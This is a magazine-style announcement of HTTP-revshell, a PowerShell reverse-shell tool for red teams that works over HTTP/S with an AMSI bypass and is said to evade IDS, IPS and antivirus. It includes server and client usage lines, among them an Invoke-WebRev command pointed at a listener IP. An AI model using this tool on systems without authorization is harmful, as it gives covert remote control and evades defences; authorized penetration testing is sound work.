HTTP-revshell - Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware

Sep 15, 2020

HTTP-revshell is a tool focused on red team exercises and pentesters. This tool provides a reverse connection through the HTTP/s protocol. It uses a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS, and AV.

Help (unisession server)

Server usage:

usage: [-h] [--ssl] [--autocomplete] host port

Process some integers.

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Help Invoke-WebRev.ps1 (client)

Client usage:

Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]


git clone
cd HTTP-revshell/
pip3 install -r requirements.txt

Quick start (multisession server)

This server allows multiple connection of clients.
There is a menu with three basic commands: sessions, interact and exit
     - sessions --> show currently active sessions
     - interact --> interacts with a session (Example: interact <session_id>)
     - exit --> close the application

IMPORTANT: To change the session press CTRL+d to exit the current session without closing it.


  • SSL
  • Proxy Aware
  • Upload....


Hakin9 TEAM
Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
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